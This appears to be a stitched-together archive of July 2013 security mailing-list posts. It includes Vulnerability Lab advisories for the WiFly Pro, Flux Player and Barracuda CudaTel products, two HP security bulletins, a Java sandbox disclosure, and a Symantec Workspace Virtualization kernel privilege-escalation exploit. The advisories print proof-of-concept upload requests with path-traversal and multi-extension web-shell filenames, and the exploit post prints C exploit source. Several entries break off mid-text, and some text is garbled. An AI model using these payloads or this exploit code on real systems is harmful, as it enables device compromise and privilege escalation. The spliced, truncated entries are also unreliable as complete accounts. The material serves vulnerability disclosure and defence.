WiFly 1.0 Pro iOS - Multiple Web Vulnerabilities

[Vulnerability Lab]

Title:
==
WiFly 1.0 Pro iOS - Multiple Web Vulnerabilities


Date:
=
2013-07-15


References:
===
http://www.vulnerability-lab.com/get_content.php?id=1011


VL-ID:
=
1011


Common Vulnerability Scoring System:

6.3


Introduction:
=
It is the best solution for transferring photos, songs, documents, movies and 
other files between computer 
and your mobile devices over wireless network. Simply launch application on 
your iOS device and scan QR 
code from http://wifly.me to connect your phone. Drop your files into opened 
page and vice versa!
No cloud or internet access required - no data leaves your local network. Both 
your devices must have access 
to the same LAN or WLAN - no additional network configurations needed. 
Transferred documents can be opened with 
any supported App on your iOS device.

Capabilities:#8232;
- Multiple uploads#8232;
- Easily Drag  Drop multiple files to WiFly#8232;
- Preview pictures in the browser
- Downloading the entire folder to your computer#8232;
- Browsing files and folders directly on mobile device#8232;
- Exchange files between mobile devices
- Built in preview of images, documents, music and video files

(Copy of the Homepage: https://itunes.apple.com/us/app/wifly-pro/id641092695 )


Abstract:
=
The Vulnerability Laboratory Research Team discovered multiple vulnerabilities 
in the WiFly 1.0 Pro application (Apple iOS - iPad  iPhone).


Report-Timeline:

2013-07-15:Public Disclosure (Vulnerability Laboratory)


Status:

Published


Affected Products:
==
Apple AppStore
Product: WiFly Pro 1.0


Exploitation-Technique:
===
Remote


Severity:
=
High


Details:

A local file include and arbitrary file upload web vulnerability is detected in 
the WiFly 1.0 Pro application (Apple iOS - iPad  iPhone).

The vulnerabilities are located in the file upload module of the web-server 
(http://localhost:4885/) when processing 
to request via POST a manipulated filename. The injected file will be 
accessable via the index listing module of the application.  

Remote attackers can exchange the filename with a double or tripple extension 
via POST method to bypass the upload validation and filter process. 
After the upload the attacker access the file with one extension and exchange 
it with the other one to execute for example php, js, html codes.

The filter in the application itself disallow to rename a file with special 
chars because of a input field restriction. Attackers need to request 
2 different urls. First the file as url with a parameter of the filename inside 
to display and as secound step the file will be uploaded with 
the manipulated filename in the POST request.

Exploitation of the vulnerability requires no user interaction but the victim 
iOS device needs to accept the other device connection.
Successful exploitation of the vulnerability results in unauthorized path or 
file access via local file include or arbitrary file upload.

Vulnerable Application(s):
[+] WiFly Pro 1.0 - ITunes or AppStore (Apple)

Vulnerable Module(s):
[+] Upload

Vulnerable File(s):
[+] upload.json  add

Vulnerable Parameter(s):
[+] filename

Affected Module(s):
[+] Index Listing (http://localhost:4885/)


Proof of Concept:
=
The local file/path include and arbitrary file upload vulnerability can be 
exploited by remote attackers without user interaction 
but the connection needs to be accepted by the target system. For demonstration 
or reproduce ...

Standard Request:
Content-Disposition: form-data; name=files[]; 
filename=s2.png\r\nContent-Type: image/png\r\n\r\n?PNG\r\n\n

Status: 200 
POST 
http://192.168.2.104:4885/api/1/upload.json?id_parent=0size=53025last_modified=1331091664536000name=new-image23.pngsessionid=1373658611109
 
Load Flags[LOAD_BYPASS_CACHE  ] Content Size[118] Mime 
Type[application/x-unknown-content-type]
   


PoC: 1.1 - File/Path Include Vulnerability
POST http://192.168.2.104:4885/api/1/upload.json?id_parent=0size=53025;
last_modified=1331091664536000name=../../[File/Path Include 
Vulnerability!].pngsessionid=1373658611109 
POST_DATA[-27213192708057
Content-Disposition: form-data; name=files[]; filename=../../[File/Path 
Include Vulnerability!]
Content-Type: image/png


PoC: 1.2 - Arbitrary File Upload Vulnerability
POST http://192.168.2.104:4885/api/1/upload.json?id_parent=0size=53025;
last_modified=1331091664536000name=[Arbitrary File Upload 
Vulnerability!].png.gif.html.php.jssessionid=1373658611109 
POST_DATA[-27213192708057
Content-Disposition: form-data; name=files[]; filename=[Arbitrary File 
Upload Vulnerability!].png.gif.html.php.js
Content-Type: image/png


Solution:

Flux Player v3.1.0 iOS - File Include Arbitrary File Upload Vulnerability

[Vulnerability Lab]

Title:
==
Flux Player v3.1.0 iOS - File Include  Arbitrary File Upload Vulnerability



Date:
=
2013-07-16


References:
===
http://www.vulnerability-lab.com/get_content.php?id=1013


VL-ID:
=
1013


Common Vulnerability Scoring System:

7.5


Introduction:
=
With `Flux Player` you can use your iPhone, iPad or iPod touch for download, 
transfer and playback of movies, 
audio books and music. The movies may be from transferred from commercial 
services, products or alternatively 
from yourself by drag-and-drop with the free `Flux Transfer` PC application.

(Copy of the Vendor Homepage: 
https://itunes.apple.com/en/app/flux-player/id324300572 )


Abstract:
=
The Vulnerability Laboratory Research Team discovered a file include  
arbitrary file upload vulnerability in the Flux Player 3.1.0 (Apple iOS - iPad 
 iPhone).


Report-Timeline:

2013-07-16:Public Disclosure (Vulnerability Laboratory)


Status:

Published


Affected Products:
==
Apple AppStore
Product: Flux Player - Application 3.1.0


Exploitation-Technique:
===
Remote


Severity:
=
High


Details:

1.1
A file include web vulnerability is detected in the Flux Player 3.1.0 
Application (Apple iOS - iPad  iPhone).
The file include vulnerability allows remote attackers to include (upload) 
local file or path requests to compromise the application or service.

The vulnerability is located in the upload module when processing to upload 
files with manipulated names via POST method. The attacker can inject 
local path or files to request context and compromise the device. The 
validation has a bad side effect which impacts the risk to combine the attack 
with persistent injected script code.

Exploitation of the vulnerability requires no user interaction or privilege 
flux player application user account. Successful exploitation of the 
vulnerability results in unauthorized local file and path requests to 
compromise the device or application.

Vulnerable Module(s):
[+] Upload (Files)

Vulnerable Parameter(s):
[+] filename 

Affected Module(s):
[+] Index File Dir Listing



1.2
An arbitrary file upload web vulnerability is detected in the Flux Player 3.1.0 
Application (Apple iOS - iPad  iPhone).
The arbitrary file upload issue allows a remote attacker to upload files with 
multiple extensions to bypass the validation for unauthorized access.

The vulnerability is located in the upload module when processing to upload 
files with multiple ending extensions. Attackers are able to upload 
a php or js web-shells by renaming the file with multiple extensions. He 
uploads for example a web-shell with the following name and 
extension picture.jpg.js.php.jpg . He deletes in the request after the upload 
the jpg to access unauthorized the malicious file (web-shell) to 
compromise the web-server or mobile device.

Exploitation of the vulnerability requires no user interaction or privilege 
flux player application user account. Successful exploitation of the 
vulnerability results in unauthorized file access because of a compromise after 
the upload of web-shells.

Vulnerable Module(s):
[+] Upload (Files)

Vulnerable Parameter(s):
[+] filename (multiple extensions)

Affected Module(s):
[+] Index File Dir Listing


Proof of Concept:
=
The local file include and arbitary file upload vulnerability can be exploited 
by remote attackers without privilege application 
user account and also without user interaction. For demonstration or reproduce 
...


1.1
--- Request Session Log 1 - Local File Include ---

Status: 200[OK]

POST http://localhost:8080/ 
Load Flags[LOAD_DOCUMENT_URI  LOAD_INITIAL_DOCUMENT_URI  ] Content Size[1053] 
Mime 

Type[application/x-unknown-content-type]
   Request Headers:
  Host[localhost:8080]
  
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:22.0) Gecko/20100101 
Firefox/22.0]
  
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
 
Accept-Language[en-US,en;q=0.5]
  Accept-Encoding[gzip, deflate]
 DNT[1]
  
Referer[http://localhost:8080/]
  Connection[keep-alive]
   
Post Data:
  POST_DATA[-21961286324572
Content-Disposition: form-data; name=file; filename=iframe src=aiframe 
src=var/app/Mobile
Content-Type: image/png
-
--
Status: 200[OK]

GET http://localhost:8080/../var/app/Mobile  [Included File/Path as Filename!]
Load Flags[LOAD_DOCUMENT_URI  ] Content Size[669] Mime 
Type[application/x-unknown-

content-type]
   Request Headers:
  Host[localhost:8080]
  
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:22.0) Gecko/20100101 
Firefox/22.0]
  
Accept 

Barracuda CudaTel 2.6.02.04 - Multiple Client Side Cross Site Vulnerabilities (Bug Bounty #17)

[Vulnerability Lab]

Title:
==
Barracuda CudaTel 2.6.02.04 - Multiple Client Side Cross Site Vulnerabilities  
(Bug Bounty #17)



Date:
=
2013-07-17


References:
===
http://vulnerability-lab.com/get_content.php?id=779

BARRACUDA NETWORK SECURITY ID: BNSEC-815


VL-ID:
=
779


Common Vulnerability Scoring System:

2.5


Introduction:
=
Designed to enable seamless voice and video communication, the CudaTel 
Communication Server is an easy-to-use, 
affordable, next-generation phone system for businesses. CudaTel Communication 
Server s enterprise-class 
feature set includes Voice over IP (VoIP) PBX services, conferencing, 
follow-me, automated attendant services, 
and more, controlled by an easy-to-use Web interface. CudaTel Communication 
Server is compatible with any SIP 
device and provider, and can be pre-configured for use with both analog and 
digital telephone networks. Powerful, 
Complete Solution With an expansive feature set and and no per user or phone 
licensing fees, the CudaTel 
Communication Server is equipped and priced for organizations of any size. 
Native High Definition audio support 
and integrated phone line (TDM) hardware produces an unparalleled audio 
experience. VOIP encryption protects calls 
from hackers and digital eavesdroppers.

(Copy of the Vendor Homepage: http://www.cudatel.com )


Abstract:
=
The Vulnerability Laboratory Research Team discovered multiple client side web 
vulnerabilities in Barracuda Networks CudaTel v2.6.002.040 appliance 
application.


Report-Timeline:

2012-11-26: Researcher Notification  Coordination (Benjamin Kunz Mejri)
2012-11-29: Vendor Notification (Barracuda Networks Security Team - Bug 
Bounty Program)
2012-12-01: Vendor Response/Feedback (Barracuda Networks Security Team)
2013-04-07: Vendor Fix/Patch (Barracuda Networks Developer Team) [Manager: 
Dave Farrow]
2012-07-17: Public Disclosure (Vulnerability Laboratory)


Status:

Published


Affected Products:
==
Barracuda Networks
Product: CudaTel - Communication Server 2.6.002.040


Exploitation-Technique:
===
Remote


Severity:
=
Medium


Details:

Multiple client side input validation vulnerabilities are detected  in 
Barracuda Networks CudaTel v2.6.002.040 appliance application.
The non-persistent vulnerabilities allows an attacker (remote) to manipulate 
client side application to browser requests.

The first vulnerability (client side) is located in the gui route module when 
processing to request the vulnerable 
bbx_outbound_route_name parameter  affected listing. The route module allows 
remote attackers via bbx_outbound_route_flag_locked 
parameter to request and execute script codes in the bbx_outbound_route_name 
listing.

The secound vulnerability (client side) is located in the ajax - html module 
when processing to request the vulnerable 
queues_wall_stub file and the ops opOpenQueueWallboard link parameters. The 
vulnerability allows remote attackers (client side) 
to change the link of the Queue Monitor Board on requests to redirect.

The third vulnerability (client side) is located in the Web login attempt fail 
exception-handling of eventlog module when 
processing to load the manipulated bbx_eventlog_message parameter. The 
vulnerability allows remote attackers to execute own 
script code (client side)  in the queues_wall_stub.html file from the 
exception-handling location for Web login attempt fails.

Exploitation of the vulnerability requires a low privilege application user 
account and medium or high user interaction.
Successful exploitation of the vulnerabilities result in client side phishing, 
client side session hijacking, client side 
external redirects to malware or evil websites and client side module context 
manipulation.

Vulnerable Section(s):
[+] GUI - ROUTE
[+] AJAX - HTML
[+] Eventlog

Vulnerable Module(s):
[+] route - Listing
[+] queues_wall_stub - Monitor Queue Link
[+] eventlog - Web login attempt fail 
(Exception Handling) - Listing 

Vulnerable Parameter(s):
[+] bbx_outbound_route_flag_locked  
bbx_outbound_route_name
[+] ops opOpenQueueWallboard
[+] bbx_eventlog_message


Proof of Concept:
=
The client side input validation vulnerabilities can be exploited by remote 
attackers without required application user account and with 
medium or high required user interaction. For demonstration or reproduce ...

1.1
Review: GUI - ROUTE  route - Listing  bbx_outbound_route_flag_locked 
[PARAMETER] bbx_outbound_route_name [LISTING]
- 
bbx_domain_id: 6
bbx_outbound_route_flag_locked: 0
bbx_outbound_route_id: 14

[security bulletin] HPSBST02896 rev.2 - HP StoreVirtual Storage, Remote Unauthorized Access

[security-alert]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Note: the current version of the following document is available here:
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/
docDisplay?docId=emr_na-c03825537

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c03825537
Version: 2

HPSBST02896 rev.2 - HP StoreVirtual Storage, Remote Unauthorized Access

NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible.

Release Date: 2013-07-17
Last Updated: 2013-07-17

Potential Security Impact: Remote unauthorized access

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
A potential security vulnerability has been identified with the HP
StoreVirtual Storage. This vulnerability could be remotely exploited to gain
unauthorized access to the device.

All HP StoreVirtual Storage systems are equipped with a mechanism that allows
HP support to access the underlying operating system if permission and access
is provided by the customer. This functionality cannot be disabled today.

HP StoreVirtual products are storage appliances that use a custom operating
system, LeftHand OS, which is not accessible to the end user. Limited access
is available to the user via the HP StoreVirtual Command-Line Interface
(CLiQ) however root access is blocked.

Root access may be requested by HP Support in some cases to help customers
resolve complex support issues. To facilitate these cases, a
challenge-response-based one-time password utility is employed by HP Support
to gain root access to systems when the customer has granted permission and
network access to the system. The one-time password utility protects the root
access by preventing repeated access to the system with the same pass phrase.
Root access to the LeftHand OS does not provide access to the user data being
stored on the system.

References: CVE-2013-2352 (SSRT101257)

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
This issue effects LeftHand OS (a.k.a. SAN iQ) software versions 10.5 and
earlier.

HP StoreVirtual device

HP P4300

HP P4500

HP P4300 G2

HP P4500 G2

HP P4800 G2

HP P4900 G2

HP P4000 VSA

HP StoreVirtual 4130

HP StoreVirtual 4330

HP StoreVirtual 4530

HP StoreVirtual 4630

HP StoreVirtual 4730

HP StoreVirtual VSA

LeftHand NSM2060

LeftHand NSM2120

Dell PowerEdge 2950

HP DL320S

IBM System x3650

LeftHand NSM2060 G2

LeftHand NSM2120 G2

LeftHand VSA

BACKGROUND

CVSS 2.0 Base Metrics
===
  Reference  Base Vector Base Score
CVE-2013-2352(AV:N/AC:L/Au:N/C:N/I:C/A:C)   9.4
===
 Information on CVSS is documented
in HP Customer Notice: HPSN-2008-002

The Hewlett-Packard Company thanks Joshua Small for reporting this issue to
security-al...@hp.com

RESOLUTION

HP has provided patches to resolve this vulnerability. Please see the table
below to determine which patch applies to the StoreVirtual version being
used.

OS Version
 Patch

HP LeftHand OS version 10.5
 10152-00

HP LeftHand OS version 10.0
 10151-00

HP P4000 SAN/iQ software versions 9.5 and 9.5.01
 25051-00

Note: Systems running HP P4000 SAN/iQ version 9.5.x must install 9.5 Patch
Set 05 before applying patch 25051-00. Installation of patch 25051-00 will
fail if 9.5 Patch Set 05 is not present

Note: HP Support may still request root access to customer systems in order
to resolve certain support issues.

Patches and release notes may be downloaded using the 9.5 or later CMC. Go to
http://www.hp.com/go/hpsc

Select your specific product. One method to do this is as follows:
Under Browse all HP products, select 'Storage'
Select 'Disk Storage Systems'
Select 'StoreVirtual Storage'
Select 'HP StoreVirtual 4000/LeftHand P4000 Storage'
If you have a HP LeftHand VSA, HP LeftHand P4300 or HP LeftHand P4500
product, select 'HP LeftHand P4000 SAN Solutions'. If you have a HP P4x00 G2
or HP StoreVirtual 4000 product select 'HP StoreVirtual 4000 Storage'.
Select 'Drivers, Software  Firmware' under 'Download Options' in the left
menu.
Select your specific product.
Select your language. Click 'Cross operating system (BIOS, Firmware,
Diagnostics, etc.)'
Click 'Patch' or scroll down to the Patch table j. In the Description column
of the Patch table, click the title of the patch:
To download the file, click the 'Download' button.
To read the release notes, click the 'Release Notes' tab.

HISTORY
Version:1 (rev.1) - 9 July 2013 Initial release
Version:2 (rev.2) - 17 July 2013 Documented the released patches, added
LeftHand NSM2120

Third Party Security Patches: Third party security patches that are to be
installed on systems running HP software products should be applied in
accordance with the customer's patch management policy.

Support: For issues about implementing the recommendations of this Security
Bulletin, contact normal HP Services support 

[SE-2012-01] New Reflection API affected by a known 10+ years old attack

[Security Explorations]

Hello All,

We discovered yet another indication that new Reflection API introduced
into Java SE 7 was not a subject to a thorough security review (if any).

A new vulnerability (Issue 69) that was submitted to Oracle today makes
it possible to implement a very classic attack against Java VM. What's
in particular interesting is that the attack itself has been in the public
knowledge for at least 10+ years [1]. It's one of those risks one should
protect against in the first place when new features are added to Java at
the core VM level. The more surprising it is to discover that Reflection
API introduced to Java SE 7 didn’t implement proper protection against
this attack.

Our Proof of Concept code for Issue 69 was confirmed to work with flying
colors under Java SE 7 Update 25 (1.7.0_25-b16) and below. The code allows
to violate a fundamental feature of Java VM security - the safety of its
type system. As a result, a complete and reliable Java security sandbox
bypass can be gained on a vulnerable instance of Oracle's Java SE software.

Oracle's blog post published on May 30, 2013 [2] implies that maintaining
the security-worthiness of Java has been Oracle’s priority following the
acquisition of Sun Microsystems. Oracle's VP goes even further by indicating
that acquired product lines [such as Java SE] were required to conform to
Oracle policies and procedures, including those comprising Oracle Software
Security Assurance [3].

If Oracle had any Software Security Assurance procedures adopted for Java
SE, most of simple Reflection API flaws along with a known, 10+ years old
attack should have been eliminated prior to Java SE 7 release. This didn't
happen, thus it is reasonable to assume that Oracle's security policies and
procedures are either not worth much or their implementation is far from
perfect. That thought alone should catch attention of Oracle customers not
necessarily relying on Java SE, but rather on other Oracle products, which
were likely the subject to the very same, questionable Software Security
Assurance policies and procedures as Java SE 7.

--

As for other things, we released technical details and Proof of Concept
code for a previously reported security vulnerability (Issue 61) that got
fixed by Oracle's Java SE CPU in Jun 2013:

http://www.security-explorations.com/materials/SE-2012-01-ORACLE-12.pdf
http://www.security-explorations.com/materials/se-2012-01-61.zip

We also released technical details and Proof of Concept codes for several
(9 in total) IBM Java flaws that were addressed by the company in early
Jul 2013:

http://www.security-explorations.com/materials/SE-2012-01-IBM-2.pdf
http://www.security-explorations.com/materials/se-2012-01-62-68.zip

The above includes details of trivially broken fixes for vulnerabilities
reported to IBM in Sep 2012 (Issues 35-37 and 49). One of the issues is
also a nice illustration of the allowed behavior (Issue 54) for other
than Oracle's Java VM implementations.

Finally, we published information (and some comment) about CVE numbers
assigned by Oracle to vulnerabilities reported by Security Explorations
as part of SE-2012-01 project:

http://www.security-explorations.com/materials/SE-2012-01-CVE_Map.pdf

Thank you.

Best Regards
Adam Gowdiak

-
Security Explorations
http://www.security-explorations.com
We bring security research to the new level
-

References:
[1] Java and Java VM security vulnerabilities and their exploitation 
techniques,

Last Stage of Delirium Research Group, http://lsd-pl.net/
[2] Maintaining the security-worthiness of Java is Oracle’s priority

https://blogs.oracle.com/security/entry/maintaining_the_security_worthiness_of
[3] Oracle Software Security Assurance
http://www.oracle.com/us/support/assurance/overview/index.html

Symantec Workspace Virtualization 6.4.1895.0 Local Kernel Mode Privilege Escalation Exploit

[th_decoder]

# Symantec Workspace Virtualization 6.4.1895.0 Local Kernel Mode Privilege 
Escalation Exploit
# Date: 2013-7-17
# Author : MJ0011
# Version: Symantec Workspace Virtualization 6.4.1895.0
# Tested on: Windows XP SP3
 
 
DETAILS:

In fslx.sys 's hook function of NtQueryValueKey , it directly write to the 
buffer of ResultLength without any check
 
 
EXPLOIT CODE:


#include stdafx.h
#include windows.h
typedef struct _UNICODE_STRING {
USHORT Length;
USHORT MaximumLength;
PWSTR  Buffer;
} UNICODE_STRING;
typedef UNICODE_STRING *PUNICODE_STRING;
typedef const UNICODE_STRING *PCUNICODE_STRING;
typedef LONG
(WINAPI *pNtQueryValueKey)(
 HANDLE KeyHandle,
 PUNICODE_STRING ValueName,
 ULONG KeyValueInformationClass,
PVOID KeyValueInformation,
 ULONG Length,
 PULONG ResultLength
);
typedef 
LONG (WINAPI *pNtQueryIntervalProfile )(
 ULONG ProfileSource,
 PULONG Interval
);


typedef LONG
(WINAPI *pZwQuerySystemInformation) (
   ULONG SystemInformationClass,
   PVOID SystemInformation,
   ULONG 
SystemInformationLength,
   PULONG ReturnLength
);
#include malloc.h
PVOID GetInfoTable(ULONG ATableType)
{
ULONG mSize = 0x4000;
PVOID mPtr = NULL;
LONG status;
HMODULE hlib = GetModuleHandle(ntdll.dll);
pZwQuerySystemInformation ZwQuerySystemInformation = 
(pZwQuerySystemInformation)GetProcAddress(hlib , ZwQuerySystemInformation);
do
{
mPtr = malloc(mSize);
if (mPtr)
{

status = ZwQuerySystemInformation(ATableType , mPtr , mSize , 0 );
}
else
{
return NULL;
}
if (status == 0xc004)
{
free(mPtr);
mSize = mSize * 2;
}
} while (status == 0xc004);
if (status == 0)
{
return mPtr;
}
free(mPtr);
return NULL;
}
enum { SystemModuleInformation = 11,
SystemHandleInformation = 16 };
typedef struct {
ULONG   Unknown1;
ULONG   Unknown2;
PVOID   Base;
ULONG   Size;
ULONG   Flags;
USHORT Index;
USHORT NameLength;
USHORT LoadCount;
USHORT PathLength;
CHARImageName[256];
} SYSTEM_MODULE_INFORMATION_ENTRY, *PSYSTEM_MODULE_INFORMATION_ENTRY;
typedef struct {
ULONG   Count;
SYSTEM_MODULE_INFORMATION_ENTRY Module[1];
} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;
 
 
 
 
typedef VOID (WINAPI *PINBV_ACQUIRE_DISPLAY_OWNERSHIP)(VOID);
typedef BOOLEAN (WINAPI *PINBV_RESET_DISPLAY)(VOID);
typedef VOID (WINAPI *PINBV_SOLID_COLOR_FILL)(
 ULONG x1,
 ULONG y1,
 ULONG x2,
 ULONG y2,
 ULONG color
);
typedef ULONG (WINAPI *PINBV_SET_TEXT_COLOR)(
 ULONG Color
);
typedef
VOID
(*INBV_DISPLAY_STRING_FILTER)(
 PUCHAR *Str
);
 
 
typedef VOID (WINAPI *PINBV_INSTALL_DISPLAY_STRING_FILTER)(
INBV_DISPLAY_STRING_FILTER DisplayStringFilter
);
typedef BOOLEAN (WINAPI *PINBV_ENABLE_DISPLAY_STRING)(
BOOLEAN bEnable
);
typedef VOID (WINAPI *PINVB_SET_SCROLL_REGION)(
ULONG x1,
ULONG y1,
ULONG x2,
ULONG y2
);
typedef VOID (WINAPI *PINBV_DISPLAY_STRING)(
PUCHAR Str
);
PINBV_ACQUIRE_DISPLAY_OWNERSHIP InbvAcquireDisplayOwnership = 0 ; 
PINBV_RESET_DISPLAY InbvResetDisplay = 0 ; 
PINBV_SOLID_COLOR_FILL InbvSolidColorFill = 0 ; 
PINBV_SET_TEXT_COLOR InbvSetTextColor = 0 ; 
PINBV_INSTALL_DISPLAY_STRING_FILTER InbvInstallDisplayStringFilter = 0 ; 
PINBV_ENABLE_DISPLAY_STRING InbvEnableDisplayString = 0 ; 
PINVB_SET_SCROLL_REGION InbvSetScrollRegion = 0 ; 
PINBV_DISPLAY_STRING InbvDisplayString= 0 ; 
 
 
#define VGA_COLOR_BLACK 0
#define VGA_COLOR_RED 1
#define VGA_COLOR_GREEN 2
#define VGA_COLOR_GR 3
#define VGA_COLOR_BULE 4
#define VGA_COLOR_DARK_MEGAENTA 5
#define VGA_COLOR_TURQUOISE 6
#define VGA_COLOR_GRAY 7
#define VGA_COLOR_BRIGHT_GRAY 8
#define VGA_COLOR_BRIGHT_RED 9
#define VGA_COLOR_BRIGHT_GREEN 10
#define VGA_COLOR_BRIGHT_YELLOW 11
#define VGA_COLOR_BRIGHT_BULE 12
#define VGA_COLOR_BRIGHT_PURPLE 13
#define VGA_COLOR_BRIGHT_TURQUOISE 14
#define VGA_COLOR_WHITE 15
UCHAR DisplayString[] = 
   
 
   
 
   
 
 = EXPLOIT SUCCESSFULLY    
 
   
 
   
 
 Symantec Workspace Virtualization 6.4.1895.0 Local Privilege Escalation 
Exploit
   
 
 VULNERABLE 

[security bulletin] HPSBMU02900 rev.1 - HP System Management Homepage (SMH) running on Linux and Windows, Multiple Remote and Local Vulnerabilities

[security-alert]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Note: the current version of the following document is available here:
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/
docDisplay?docId=emr_na-c03839862

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c03839862
Version: 1

HPSBMU02900 rev.1 - HP System Management Homepage (SMH) running on Linux and
Windows, Multiple Remote and Local Vulnerabilities

NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible.

Release Date: 2013-07-18
Last Updated: 2013-07-18

Potential Security Impact: Local Denial of Service (DoS), remote Denial of
Service (DoS), execution of arbitrary code, gain extended privileges,
disclosure of information, unauthorized access, XSS

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
Potential security vulnerabilities have been identified with HP System
Management Homepage (SMH) running on Linux and Windows. The vulnerabilities
could be exploited remotely resulting in Local Denial of Service (DoS),
remote Denial of Service (DoS), execution of arbitrary code, gain privileges,
disclosure of information, unauthorized access, or XSS.

References:
CVE-2011-3389 (SSRT100740) Remote disclosure of information
CVE-2012-0883 (SSRT101209) Remote gain extended privileges
CVE-2012-2110 (SSRT101210) Remote Denial of Service (DoS)
CVE-2012-2311 (SSRT100992) Remote execution of arbitrary code
CVE-2012-2329 (SSRT100992) Remote Denial of Service (DoS)
CVE-2012-2335 (SSRT100992) Remote execution of arbitrary code
CVE-2012-2336 (SSRT100992) Remote Denial of Service (DoS)
CVE-2013-2355 (SSRT100696) Remote unauthorized Access
CVE-2013-2356 (SSRT100835) Remote disclosure of information
CVE-2013-2357 (SSRT100907) Remote Denial of Service (DoS)
CVE-2013-2358 (SSRT100907) Remote Denial of Service (DoS)
CVE-2013-2359 (SSRT100907) Remote Denial of Service (DoS)
CVE-2013-2360 (SSRT100907) Remote Denial of Service (DoS)
CVE-2013-2361 (SSRT101007) XSS
CVE-2013-2362 (SSRT101076, ZDI-CAN-1676) Local Denial of Service (DoS)
CVE-2013-2363 (SSRT101150) Remote disclosure of information
CVE-2013-2364 (SSRT101151) XSS
CVE-2013-5217 (SSRT101137) Remote unauthorized access

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP System Management Homepage (SMH) v7.2.0 and earlier running on Linux and
Windows.

BACKGROUND

CVSS 2.0 Base Metrics
===
  Reference  Base Vector Base Score
CVE-2011-3389(AV:N/AC:M/Au:N/C:P/I:N/A:N)   4.3
CVE-2012-0883(AV:L/AC:M/Au:N/C:C/I:C/A:C)   6.9
CVE-2012-2110(AV:N/AC:L/Au:N/C:P/I:P/A:P)   7.5
CVE-2012-2311(AV:N/AC:L/Au:N/C:P/I:P/A:P)   7.5
CVE-2012-2329(AV:N/AC:L/Au:N/C:N/I:N/A:P)   5.0
CVE-2012-2335(AV:N/AC:L/Au:N/C:P/I:P/A:P)   7.5
CVE-2012-2336(AV:N/AC:L/Au:N/C:N/I:N/A:P)   5.0
CVE-2013-2355(AV:N/AC:M/Au:N/C:P/I:N/A:N)   4.3
CVE-2013-2356(AV:N/AC:L/Au:N/C:C/I:N/A:N)   7.8
CVE-2013-2357(AV:N/AC:M/Au:S/C:N/I:N/A:C)   6.3
CVE-2013-2358(AV:N/AC:M/Au:S/C:N/I:N/A:C)   6.3
CVE-2013-2359(AV:N/AC:M/Au:S/C:N/I:N/A:P)   3.5
CVE-2013-2360(AV:N/AC:M/Au:S/C:N/I:N/A:P)   3.5
CVE-2013-2361(AV:N/AC:M/Au:N/C:N/I:P/A:N)   4.3
CVE-2013-2362(AV:L/AC:H/Au:S/C:N/I:N/A:P)   1.0
CVE-2013-2363(AV:N/AC:H/Au:N/C:C/I:N/A:P)   6.1
CVE-2013-2364(AV:N/AC:L/Au:S/C:N/I:N/A:P)   4.0
CVE-2013-5217(AV:N/AC:H/Au:N/C:P/I:N/A:N)   2.6
===
 Information on CVSS is documented
in HP Customer Notice: HPSN-2008-002

The Hewlett-Packard Company thanks agix for working with the TippingPoint
Zero Day Initiative to report vulnerability CVE-2013-2362 to
security-al...@hp.com

RESOLUTION

HP has made System Management Homepage (SMH) v7.2.1 or subsequent available
for Windows and Linux to resolve the vulnerabilities.

Information and updates for SMH can be found at the following location:

http://h18013.www1.hp.com/products/servers/management/agents/index.html

HISTORY
Version:1 (rev.1) - 18 July 2013 Initial release

Third Party Security Patches: Third party security patches that are to be
installed on systems running HP software products should be applied in
accordance with the customer's patch management policy.

Support: For issues about implementing the recommendations of this Security
Bulletin, contact normal HP Services support channel.  For other issues about
the content of this Security Bulletin, send e-mail to security-al...@hp.com.

Report: To report a potential security vulnerability with any HP supported
product, send Email to: security-al...@hp.com

Subscribe: To initiate a subscription to receive future HP Security Bulletin
alerts via Email:
http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins

Security Bulletin Archive: A list of recently released Security Bulletins is